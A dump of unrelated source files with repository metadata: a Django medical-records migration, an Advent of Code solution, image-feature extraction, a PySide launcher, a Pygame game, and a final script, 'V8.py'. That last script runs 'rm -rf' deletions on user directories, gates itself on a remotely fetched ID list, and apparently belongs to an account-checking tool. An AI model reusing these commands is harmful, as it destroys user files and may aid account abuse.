                ('bloodType', models.CharField(choices=[('O(I) Rh-', 'O(I) Rh-'), ('O(I) Rh+', 'O(I) Rh+'), ('A(II) Rh+', 'A(II) Rh+'), ('A(II) Rh-', 'A(II) Rh-'), ('B(III) Rh+', 'B(III) Rh+'), ('AB(IV) Rh+', 'AB(IV) Rh+'), ('AB(IV) Rh-', 'AB(IV) Rh-')], max_length=12)),
                ('phone', models.CharField(max_length=30)),
                ('email', models.EmailField(max_length=254)),
                ('socialStatus', models.CharField(max_length=80)),
                ('maritalStatus', models.CharField(max_length=50)),
                ('idAddress', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.address')),
            ],
        ),
        migrations.CreateModel(
            name='Physiotherapy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('namePhysiotherapy', models.CharField(max_length=60)),
                ('valuePhysiotherapy', models.FloatField()),
                ('unitPhysiotherapy', models.CharField(max_length=20)),
                ('datePhysiotherapy', models.DateTimeField()),
            ],
        ),
        migrations.CreateModel(
            name='StageOfTreatment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('stageName', models.CharField(max_length=100)),
                ('startStage', models.DateTimeField()),
                ('endStage', models.DateTimeField(blank=True)),
            ],
        ),
        migrations.CreateModel(
            name='Surgery',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('DateIntervention', models.DateTimeField()),
            ],
        ),
        migrations.CreateModel(
            name='TreatmentSession',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('startSession', models.DateTimeField()),
                ('endSession', models.DateTimeField(blank=True)),
                ('idDoctor', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='treatment_session', to='patient_ill_history.medicalstaff')),
                ('idMainIll', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl025')),
                ('idPatient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='treatment_session', to='patient_ill_history.patient')),
            ],
            options={
                'unique_together': {('startSession', 'endSession')},
            },
        ),
        migrations.CreateModel(
            name='SurgeryMedicalStaff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('medicalStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
                ('surgery', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='sur_med_staff', to='patient_ill_history.surgery')),
            ],
        ),
        migrations.AddField(
            model_name='surgery',
            name='idMedStaff',
            field=models.ManyToManyField(through='patient_ill_history.SurgeryMedicalStaff', to='patient_ill_history.MedicalStaff'),
        ),
        migrations.AddField(
            model_name='surgery',
            name='idNameIntervention',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl026'),
        ),
        migrations.AddField(
            model_name='surgery',
            name='idStage',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='surgery', to='patient_ill_history.stageoftreatment'),
        ),
        migrations.CreateModel(
            name='State',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('idStage', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='state', to='patient_ill_history.stageoftreatment')),
            ],
        ),
        migrations.AddField(
            model_name='stageoftreatment',
            name='idSession',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stage_of_treatment', to='patient_ill_history.treatmentsession'),
        ),
        migrations.CreateModel(
            name='PhysiotherapyMedicalStaff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('medicalStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
                ('physiotherapy', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physiotherapy_med_staff', to='patient_ill_history.physiotherapy')),
            ],
        ),
        migrations.AddField(
            model_name='physiotherapy',
            name='idMedStaff',
            field=models.ManyToManyField(through='patient_ill_history.PhysiotherapyMedicalStaff', to='patient_ill_history.MedicalStaff'),
        ),
        migrations.AddField(
            model_name='physiotherapy',
            name='idStage',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='physiotherapy', to='patient_ill_history.stageoftreatment'),
        ),
        migrations.CreateModel(
            name='LaboratoryTest',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('valueTest', models.FloatField()),
                ('unitTest', models.CharField(max_length=20)),
                ('dateTest', models.DateTimeField()),
                ('laboratoryName', models.CharField(max_length=150)),
                ('idMedStaff', models.ManyToManyField(through='patient_ill_history.LabMedicalStaff', to='patient_ill_history.MedicalStaff')),
                ('idState', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='laboratory_test', to='patient_ill_history.state')),
                ('nameTest', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl027')),
            ],
            options={
                'unique_together': {('valueTest', 'unitTest', 'dateTest', 'laboratoryName')},
            },
        ),
        # Back-fill the FK sides of the LabMedicalStaff through model.
        migrations.AddField(
            model_name='labmedicalstaff',
            name='laboratoryTest',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='lab_staff', to='patient_ill_history.laboratorytest'),
        ),
        migrations.AddField(
            model_name='labmedicalstaff',
            name='medicalStaff',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff'),
        ),
        migrations.CreateModel(
            name='EusMedicalStaff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('eus', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='eus_med_staff', to='patient_ill_history.electroultrasoundtherapy')),
                ('medicalStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
            ],
        ),
        migrations.AddField(
            model_name='electroultrasoundtherapy',
            name='idMedStaff',
            field=models.ManyToManyField(through='patient_ill_history.EusMedicalStaff', to='patient_ill_history.MedicalStaff'),
        ),
        migrations.AddField(
            model_name='electroultrasoundtherapy',
            name='idStage',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='electro_ultrasound_therapy', to='patient_ill_history.stageoftreatment'),
        ),
        migrations.CreateModel(
            name='Comorbidity',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('idNameIll', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl025')),
                ('idSession', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comorbidity', to='patient_ill_history.treatmentsession')),
            ],
        ),
        # Uniqueness constraints added after all referenced fields exist.
        migrations.AlterUniqueTogether(
            name='surgery',
            unique_together={('DateIntervention',)},
        ),
        migrations.AlterUniqueTogether(
            name='stageoftreatment',
            unique_together={('stageName', 'startStage', 'endStage')},
        ),
        migrations.AlterUniqueTogether(
            name='physiotherapy',
            unique_together={('namePhysiotherapy', 'valuePhysiotherapy', 'unitPhysiotherapy', 'datePhysiotherapy')},
        ),
        migrations.CreateModel(
            name='Pharmacotherapy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('dosePill', models.FloatField()),
                ('unitPill', models.CharField(max_length=20)),
                ('datePill', models.DateTimeField()),
                ('idNamePill', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationclpill')),
                ('idStage', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pharmacotherapy', to='patient_ill_history.stageoftreatment')),
            ],
            options={
                'unique_together': {('dosePill', 'unitPill', 'datePill')},
            },
        ),
        migrations.CreateModel(
            name='Measurement',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('valueMeasurement', models.FloatField()),
                ('dateMeasurement', models.DateTimeField()),
                ('idCatalogMeasurement', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.catalogmeasurement')),
                ('idMedStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
                ('idState', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='measurement', to='patient_ill_history.state')),
            ],
            options={
                'unique_together': {('valueMeasurement', 'dateMeasurement')},
            },
        ),
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nameImage', models.CharField(max_length=80)),
                ('hostImage', models.FilePathField()),
                ('dateImage', models.DateTimeField()),
                ('idState', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='image', to='patient_ill_history.state')),
            ],
            options={
                'unique_together': {('nameImage', 'hostImage', 'dateImage')},
            },
        ),
        migrations.AlterUniqueTogether(
            name='electroultrasoundtherapy',
            unique_together={('nameEus', 'valueEus', 'unitEus', 'dateEus')},
        ),
    ]
|
[
"angelicaannalilia@gmail.com"
] |
angelicaannalilia@gmail.com
|
a31963fd4f94c414e2441d015b5cce90aa09af2b
|
c18b555774293cf7170a35d09722f7cb753d71d7
|
/D11_1_works_on_test.py
|
89d49ecd06d822f3174a7991b792918b4c616a51
|
[] |
no_license
|
Jake-Jasper/AOC_2020
|
17bf15445313793075019c00e4c92cbed0d081bf
|
a3156198ca29f32d885ded36aa2947def09bda80
|
refs/heads/main
| 2023-02-09T15:58:44.461895
| 2021-01-05T21:21:50
| 2021-01-05T21:21:50
| 317,528,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,686
|
py
|
'''
If a seat is empty (L) and there are no occupied seats adjacent to it, the seat becomes occupied.
If a seat is occupied (#) and four or more seats adjacent to it are also occupied, the seat becomes empty.
Otherwise, the seat's state does not change.
. = FLoor
L = Empty seat
occupied seat = #
'''
# NOTE(review): pprint is imported but never used below.
import pprint, copy
# Example grid from the AOC 2020 day 11 puzzle ('.' floor, 'L' empty seat).
test_case = '''\
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
'''
test_case = test_case.splitlines()
test_case = [list(i) for i in test_case]  # grid as list of rows of single chars
# Real puzzle input, same list-of-lists-of-chars representation.
AOC = open('D11_data', 'r').read().splitlines()
AOC = [list(i) for i in AOC]
def convolve(arr):
    """Advance the seating simulation by one step.

    Only interior cells are examined, so *arr* must carry a one-cell
    border of floor ('.') around the real grid (see pad()).  Returns a
    tuple (next_grid, current_grid); the input grid is not mutated.
    """
    nxt = copy.deepcopy(arr)
    height = len(arr)
    width = len(arr[0])
    for r in range(1, height - 1):
        for c in range(1, width - 1):
            cell = arr[r][c]
            # Count occupied seats in the 3x3 window, then drop the centre
            # itself so only the 8 neighbours remain.
            occupied = sum(row[c - 1:c + 2].count('#') for row in arr[r - 1:r + 2])
            if cell == '#':
                occupied -= 1
            if cell == 'L' and occupied == 0:
                nxt[r][c] = '#'
            elif cell == '#' and occupied >= 4:
                nxt[r][c] = 'L'
    return nxt, arr
def pad(arr):
    """Surround *arr* with a one-cell border of floor ('.').

    Mutates *arr* in place and also returns it, so convolve() can index
    i-1/i+1 and j-1/j+1 without bounds checks.
    """
    for row in arr:
        row.insert(0, '.')
        row.append('.')
    width = len(arr[0])
    arr.insert(0, ['.'] * width)
    # BUG FIX: the bottom border must be appended at the END of the grid.
    # The original inserted it at index len(arr[0]) (the grid WIDTH), which
    # lands in the middle of any grid taller than it is wide and corrupts
    # the simulation — the likely cause of the "off by 13" result noted at
    # the bottom of this file.
    arr.append(['.'] * width)
    return arr
# Pad both grids once, up front, so convolve() never indexes out of range.
AOC = pad(AOC)
test_case = pad(test_case)
def compute(arr):
    """Iterate the simulation until it stabilises.

    Prints the number of occupied seats in the fixed point and returns the
    final grid.  BUG FIX: the original recursed with ``compute(new)`` but
    discarded the recursive result, so every call that did not converge on
    the first step returned None; the loop below always returns the final
    grid (and avoids recursion-depth limits on slow-converging inputs).
    """
    while True:
        new, arr = convolve(arr)
        if new == arr:
            print(sum(line.count('#') for line in new))
            return new
        arr = new
# NOTE(review): the "off by 13" discrepancy the author reported traces to
# pad() inserting the bottom border row at index len(arr[0]) (the grid
# WIDTH) instead of at the end — on a grid taller than it is wide the
# border lands mid-grid and splits the last rows off from the simulation.
compute(test_case)
|
[
"jake@pc.home"
] |
jake@pc.home
|
3220c25bb055c62542f30c5c94ea0e8a33be745f
|
3d32dad4f5476d369d4f5510291ec55fbe8700b1
|
/Python_Scrpting/venv/bin/pip3
|
1f7788fef281aab06b8e35d7b14725426b14568e
|
[] |
no_license
|
Mancancode/Python
|
59e0af3b33e4d0453f56686e4814638d0f123020
|
10b3a79f8db403dcc535517b2bd8bc4bbf12263c
|
refs/heads/master
| 2020-03-20T15:23:08.119951
| 2018-06-16T02:31:24
| 2018-06-16T02:31:24
| 137,511,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
#!/home/manmiliki/PycharmProjects/Python_Scrpting/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
# Auto-generated setuptools wrapper: resolves the 'pip3' console_scripts
# entry point of pip 10.0.1 inside this virtualenv and runs it.
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip a trailing '-script.py(w)'/'.exe' so pip sees a clean argv[0].
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
    )
|
[
"achonwaechris@outlook.com"
] |
achonwaechris@outlook.com
|
|
df8e98d1b351ecf9fb077a510c1ae2960a718e84
|
fcb3d6477c2e8e0c13676dfd01dc866be8965ad0
|
/featureExtraction.py
|
3b976010ec832074c8629e7685dd617feb5d5198
|
[] |
no_license
|
monikaban/captionGeneration
|
7de2b59679799b63ad0a04507b6393ffb090bb55
|
aeb5e103b5fd8cc4de24dbcee17e1d3f2fa08f99
|
refs/heads/master
| 2020-04-21T11:13:14.435305
| 2019-02-13T00:59:23
| 2019-02-13T00:59:23
| 169,515,848
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
from os import listdir
from pickle import dump
from keras.applications.vgg16 import VGG16
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
from keras.applications.vgg16 import preprocess_input
from keras.models import Model
def extract_features(directory):
    """Compute a VGG16 feature vector for every photo in *directory*.

    Returns a dict mapping the file name (without extension) to the
    network's penultimate-layer activations for that image.
    """
    # Load VGG16 and rebuild it without the final classification layer so
    # predict() yields feature vectors instead of class scores.
    model = VGG16()
    model.layers.pop()
    model = Model(inputs=model.inputs, outputs=model.layers[-1].output)
    print(model.summary())
    features = {}
    for fname in listdir(directory):
        path = directory + '/' + fname
        # VGG16 expects 224x224 RGB input.
        img = load_img(path, target_size=(224, 224))
        pixels = img_to_array(img)
        # Add the leading batch dimension of size 1.
        pixels = pixels.reshape((1,) + pixels.shape)
        # Apply the VGG-specific preprocessing (channel mean subtraction).
        pixels = preprocess_input(pixels)
        vector = model.predict(pixels, verbose=0)
        image_id = fname.split('.')[0]
        features[image_id] = vector
    return features
# Extract features for every image in the Flickr8k dataset and cache them.
directory = 'Flicker8k_Dataset'
features = extract_features(directory)
print('Extracted Features: %d' % len(features))
# Persist to disk.  BUG FIX: the original passed an anonymous open(...) to
# dump() and never closed it; a context manager guarantees the handle is
# flushed and closed, avoiding a truncated pickle on interpreter teardown.
with open('features.pkl', 'wb') as out:
    dump(features, out)
|
[
"noreply@github.com"
] |
monikaban.noreply@github.com
|
805776c9d109712adad22be2a5ff49a4bae5dd2d
|
3ad602c5a4225d0a23adfb3c3bc6b2b8b596349a
|
/main.py
|
e65c52014646f5bd1d859d74eee914dc4836ff6a
|
[
"MIT"
] |
permissive
|
samraisbeck/QuickAccess
|
79c833a80af6cad10017ba1711938463aabec9f8
|
3a3f13a32f3e22eafbed4ea3ec5972108caa24ac
|
refs/heads/master
| 2021-01-01T20:45:21.795857
| 2017-08-10T18:56:59
| 2017-08-10T18:56:59
| 98,926,888
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,570
|
py
|
from PySide import QtCore, QtGui
import yaml
from subprocess import *
import os, sys
from widgetInternet import WidgetInternet
class ProgramManager(QtGui.QMainWindow):
def __init__(self):
super(ProgramManager, self).__init__()
self.programs = None
self.keys = []
self.readConfig()
self._InternetOptions = WidgetInternet(parent=self)
self._initUI()
def readConfig(self):
try:
with open('config.yaml', 'r') as f:
try:
self.programs = yaml.safe_load(f)
except yaml.YAMLError:
print 'Could not read config.yaml.'
raise
except IOError:
print 'Could not find the config.yaml file.'
raise
if self.programs is not None:
self.keys = self.programs.keys()
def _initUI(self):
if self.programs == None:
print 'No programs configured. Exiting...'
sys.exit(0)
cols = 3
grid = QtGui.QGridLayout()
self._createToolbar()
label = QtGui.QLabel('QuickAccess', parent=self)
font = QtGui.QFont()
font.setBold(True)
font.setPointSize(13)
label.setFont(font)
grid.addWidget(label, 0, 0, alignment=QtCore.Qt.AlignHCenter)
grid.addWidget(self._InternetOptions, 1, 0, alignment=QtCore.Qt.AlignHCenter)
separator = QtGui.QFrame()
separator.setFrameShape(QtGui.QFrame.HLine)
separator.setFrameShadow(QtGui.QFrame.Sunken)
grid.addWidget(separator, 2, 0)
buttonGrid = QtGui.QGridLayout()
for i in range(len(self.programs)):
button = QtGui.QPushButton(self.keys[i], parent=self)
self.connect(button, QtCore.SIGNAL('pressed()'), self.launchProgram)
buttonGrid.addWidget(button, i/cols, i%cols)
grid.addLayout(buttonGrid, 3, 0)
Qw = QtGui.QWidget()
Qw.setLayout(grid)
self.setCentralWidget(Qw)
self.setWindowTitle('QuickAccess for '+os.environ['USERNAME']+' on '+os.environ['COMPUTERNAME'])
self.show()
def _createToolbar(self):
m = QtGui.QMenu('Options', parent=self)
option = QtGui.QAction('View History', m)
# option.setShortcut('Ctrl+H')
option.setStatusTip('View URL history.')
option.triggered.connect(self.viewHistory)
m.addAction(option)
option = QtGui.QAction('Delete History', m)
# option.setShortcut('Ctrl+L')
option.setStatusTip('Delete current URL history.')
option.triggered.connect(self._InternetOptions.clearHistory)
m.addAction(option)
self.menuBar().addMenu(m)
def launchProgram(self):
button = self.sender()
text = button.text()
try:
if self.programs[text][-3:] == '.py':
Popen([sys.executable, self.programs[text]], cwd = os.path.dirname(self.programs[text]))
elif os.sep[0] in self.programs[text]:
# this is the case where we give something you would double click to start, like an executable
Popen([self.programs[text]], cwd = os.path.dirname(self.programs[text]))
else:
# this is the case where we give a program name like "chrome".
os.system("start "+self.programs[text])
except:
print "Could not open "+self.programs[text]
raise
def viewHistory(self):
history = self._InternetOptions.history
grid = QtGui.QGridLayout()
grid.addWidget(QtGui.QLabel('URL History', parent=None),0, 0, alignment=QtCore.Qt.AlignHCenter)
edit = QtGui.QTextEdit(parent=None)
edit.setReadOnly(True)
editStr = ''
if len(history) == 0:
editStr += 'History is empty!'
for item in history:
editStr += item[0]+' -> '+str(item[1])+'\n'
edit.setText(editStr)
grid.addWidget(edit)
Qw = QtGui.QWidget(parent=self)
Qw.setLayout(grid)
Qw.setWindowFlags(QtCore.Qt.Window)
Qw.show()
def closeEvent(self, event):
history = self._InternetOptions.history
if not history == []:
with open('history.txt', 'w') as f:
for item in history:
f.write(item[0]+' '+str(item[1])+'\n')
f.close()
super(ProgramManager, self).closeEvent(event)
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, build the main window
    # (which calls show() itself), then enter the event loop.
    app = QtGui.QApplication(sys.argv)
    mw = ProgramManager()
    app.exec_()
|
[
"ssraisbeck10@gmail.com"
] |
ssraisbeck10@gmail.com
|
854da1c656400983050897ea2995f5f55d468357
|
859e95b9b3a2c21b79eb3bb6eac85ba5463ac95c
|
/Flappy_Bird/flappy.py
|
8092a9503e9c62f0ecaa6cbc893820a118edd98b
|
[] |
no_license
|
kushnayak/PyGame
|
a0c1314bc5d2b82c138ebeaf14f3a1ea824e8896
|
493254f8c62caec87d17e2de626f9b9042b529b9
|
refs/heads/master
| 2022-12-24T08:23:44.303494
| 2020-10-03T03:46:50
| 2020-10-03T03:46:50
| 263,222,038
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,863
|
py
|
def flappy():
    """Run a self-contained Flappy Bird clone in a 1000x600 pygame window.

    Blocks until the window is closed; all assets are loaded from the
    ./Resources directory relative to the working directory.
    """
    import pygame,random, math,time
    pygame.init()
    carryOn = True
    screen = pygame.display.set_mode((1000, 600))
    over = pygame.font.Font('freesansbold.ttf',160)
    background = pygame.image.load('./Resources/clouds.png').convert()
    flappyicon = pygame.image.load("./Resources/flap.png")
    pygame.display.set_icon(flappyicon)
    # Per-frame deltas: positive ychange pulls the bird down (gravity);
    # negative pipechange scrolls the pipes right-to-left.
    ychange = 5
    pipechange = -10
    angle = 0
    # NOTE(review): adjustx/adjusty, nextpipex, pipepoints and diffpipes are
    # set up below but never used by the game loop — leftovers from a draft.
    adjustx = 0
    adjusty = 0
    birdx = 300
    birdy = 300
    currentpipex = 1000
    nextpipex = 500
    pipey= -500
    scorex = 10
    scorey = 10
    pipepoints = []
    diffpipes = []
    for x in range(3):
        diffpipes.append(pygame.image.load("./Resources/Top Pipe.png"))
        diffpipes.append(pygame.image.load("./Resources/Bottom Pipe.png"))
        pipepoints.append(random.randint(-900,-500))
    flappy = pygame.image.load('./Resources/flap.png')
    angry_bird = pygame.image.load('./Resources/angry-bird-icon.png')
    toppipe = pygame.image.load("./Resources/Top Pipe.png")
    bottompipe = pygame.image.load("./Resources/Bottom Pipe.png")
    score_ = 0
    font = pygame.font.Font('freesansbold.ttf',32)
    # NOTE(review): 'over' is rebound here, shadowing the 160 pt font above.
    over = pygame.font.Font('freesansbold.ttf',60)
    def player(x,y,tilt):
        # Draw the bird rotated by *tilt* degrees at (x, y).
        flap = pygame.transform.rotate(angry_bird,tilt)
        screen.blit(flap,(x,y))
    def pipes(x,y):
        # Draw the top pipe at (x, y) and the bottom pipe 1070 px lower.
        screen.blit(toppipe,(x,y))
        screen.blit(bottompipe,(x,y+1070))
    def isCollison(birdx,birdy,pipex,pipey):
        # Sample 9 points around the bird's centre against the pipe column.
        # Returns True when a sampled point is inside the vertical band
        # topy..bottomy (this is treated as "through the gap" — score_ is
        # incremented on True), False when inside the column but outside
        # that band, and None when horizontally clear of the pipe.
        topy = pipey + 940
        bottomy = topy + 120
        actualx = pipex + 25
        birdx += 40
        birdy += 40
        possible = []
        possible.extend([(birdx, birdy),(birdx, birdy + 30),(birdx + 30, birdy), (birdx, birdy - 30),(birdx - 30, birdy),(birdx + 30, birdy + 30),(birdx + 30, birdy - 30), (birdx - 30, birdy + 30),(birdx - 30, birdy- 30 )])
        for z in possible:
            x = z[0]
            y = z[1]
            if ((actualx - 30) <= x <= (actualx + 30)) and (topy <= y <= bottomy):
                return True
            elif ((actualx - 30) <= x <= (actualx + 30)) and (y > topy or y < bottomy):
                return False
    def game_over():
        # NOTE(review): defined but never called; the loop below renders the
        # game-over text inline instead.
        over_ = over.render('GAME OVER',True, (0,0,0))
        screen.blit(over_, (500,300))
    def show_score(x,y):
        # Render the current score at (x, y).
        score = font.render('Score: ' + str(score_),True, (255,255,255))
        screen.blit(score,(x,y))
    print(pipepoints[1])
    print(diffpipes)
    # Main game loop: handle input, apply physics, draw, detect collisions.
    while carryOn:
        screen.blit(background,(0,0))
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                carryOn= False
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_SPACE:
                    # Space held: bird rises and tilts up.
                    ychange = -4
                    angle = 45
            if event.type == pygame.KEYUP:
                if event.key == pygame.K_SPACE:
                    # Space released: gravity resumes, bird tilts down.
                    ychange = 5
                    angle = -20
            if event.type == pygame.MOUSEBUTTONDOWN:
                # Debug aid: dump coordinate systems on click.
                print(f"Pipe System: {(currentpipex,pipey)} Pipe clicked: {pygame.mouse.get_pos()}")
                print(f"Bird System: {(birdx, birdy)} Bird clicked: {pygame.mouse.get_pos()}")
        birdy += ychange
        currentpipex+= pipechange
        player(birdx,birdy,angle)
        pipes(currentpipex,pipey)
        if currentpipex <= 0:
            # Pipe scrolled off-screen: respawn on the right at a random height.
            currentpipex = 1000
            pipey = random.randint(-900,-500)
        if birdy <=-64:
            birdy=-64
        if isCollison(birdx,birdy,currentpipex,pipey) is True:
            score_ += 1
        if isCollison(birdx,birdy,currentpipex,pipey) is False or birdy >= 530:
            # Crash (hit pipe or ground): freeze motion and show game over.
            ychange = 0
            pipechange = 0
            display = over.render('GAME OVER',True,(0,0,0))
            screen.blit(display,(300,300))
            pygame.display.update()
        show_score(scorex,scorey)
        pygame.display.update()
|
[
"kushnayak123@gmail.com"
] |
kushnayak123@gmail.com
|
ed3204d0b15b6947335c928946e23a11a5818bd2
|
e0e4673fa8aff88c46f08e8ba775a98e501b1944
|
/pythonbasico/ejercicio19.py
|
adf8932e5fe16c20fac46eb7b0ab67a8334abd32
|
[] |
no_license
|
xjhruiz/Proyectos
|
9cf989db2671703ad0b4b28438582a4ff1224399
|
0883a2722d4107bb6f9ca2edf8f87e6fa4e430cb
|
refs/heads/master
| 2022-12-06T22:12:16.118811
| 2021-08-31T12:39:33
| 2021-08-31T12:39:33
| 231,554,283
| 0
| 0
| null | 2022-11-24T09:28:02
| 2020-01-03T09:22:55
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 495
|
py
|
'''
Created on 24 Feb 2018.  Reads ten numbers from the user and reports
whether any value is repeated.

@author: Jhonatan
'''
# TODO: also do exercises 23 and 16
repetido = False  # set to True when any duplicate is found
cont=0  # NOTE(review): unused counter, presumably left over from a draft
datos = [0,0,0,0,0,0,0,0,0,0]
# Read 10 values; Python 2 input() evaluates the typed expression.
for i in range(0,10):
    datos[i]=input("Introduzca el numeros {} ".format(i+1))
print datos
# Walk backwards: a value that also appears earlier in the list is a repeat.
for i in range(len(datos)-1,0,-1):
    if datos[i] in datos[:i]:
        repetido =True
if repetido == False:
    print "no hay ningun numero repetido"
else:
    print"hay algun numero repetido"
|
[
"noreply@github.com"
] |
xjhruiz.noreply@github.com
|
9f6615d52dac754d42b5b7e518b68cdc0071e6a3
|
020426cc34f5f98aa2998ce61e5f9a36355292eb
|
/V8.py
|
1fa6ff3518a53fc3b00ecf2f0b49a0a9f386e018
|
[] |
no_license
|
j2s20202929292j22n/V8
|
728620af72ca234a71d014c6a95b8527b7bf9c89
|
548fa7d7a8cb6b3a06a5b4de4e7dbd2fddbd3be3
|
refs/heads/main
| 2023-07-09T11:09:52.383862
| 2021-08-14T11:18:44
| 2021-08-14T11:18:44
| 395,819,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,595
|
py
|
#Update
import requests, sys, os, random, time, user_agent
import os,sys
os.system('rm -rf .daxl1.py ;rm -rf /sdcard/download/.daxl1.py ;clear')
import subprocess
import json
bad=0
hits=0
timeout=0
error=0
checkpoint=0
##################
os.system("clear")
os.system("rm -rf .Cheker.py")
os.system("cd .. ;cd home ;rm -rf Cheker.py ;clear")
os.system('clear')
os.system('rm -rf list.txt')
os.system('id -u > list.txt')
uidd = open('list.txt', 'r')
for j in uidd:
sp = j.split()
def chk():
uuid = str(os.geteuid()) + str(os.getlogin())
id = "-".join(uuid)
print("\n\n\x1b[37;1mYour ID : "+id)
try:
httpCaht = requests.get("https://raw.githubusercontent.com/MrTLYAKI/list.txt/main/list.txt").text
if id in httpCaht:
print("\033[92mYOUR ID IS ACTIVE.........\033[97m")
msg = str(os.geteuid())
time.sleep(1)
pass
else:
print("\x1b[91mID ACTIVE NYa bo kren nama bnera @lililliilliil\033[97m")
time.sleep(1)
sys.exit()
except:
sys.exit()
if name == '__main__':
chk()
chk()
wd = "\033[90;1m"
GL = "\033[96;1m"
BB = "\033[34;1m"
YY = "\033[33;1m"
GG = "\033[32;1m"
WW = "\033[0;1m"
RR = "\033[31;1m"
CC = "\033[36;1m"
B = "\033[34m"
Y = "\033[33;1m"
G = "\033[32m"
W = "\033[0;1m"
R = "\033[31m"
logo1=G+'''
888888b. Y88b d88P 888b 888
888 "88b Y88b d88P 8888b 888
888 .88P Y88o88P 88888b 888
8888888K. Y888P 888Y88b 888
888 "Y88b d888b 888 Y88b888
888 888 d88888b 888 Y88888
888 d88P d88P Y88b 888 Y8888
8888888P" d88P Y88b 888 Y888
'''+W+''' ---------------------------------------------------
'''+wd+'''
'''+W+'''---------------------------------------------------'''
logo2=G+'''
888888b. Y88b d88P 888b 888
888 "88b Y88b d88P 8888b 888
888 .88P Y88o88P 88888b 888
8888888K. Y888P 888Y88b 888
888 "Y88b d888b 888 Y88b888
888 888 d88888b 888 Y88888
888 d88P d88P Y88b 888 Y8888
8888888P" d88P Y88b 888 Y888
'''+W+''' ---------------------------------------------------
'''+wd+'''Author : TLYAK
Tool New =======BNX===========
Tlegram : Team_cod3r_1
Note : 10$
'''+W+''' ---------------------------------------------------
=====BNX=====
'''+W+''' ---------------------------------------------------
'''+wd+''' == Wait = 1hmin = 2h ===
'''+W+''' ---------------------------------------------------
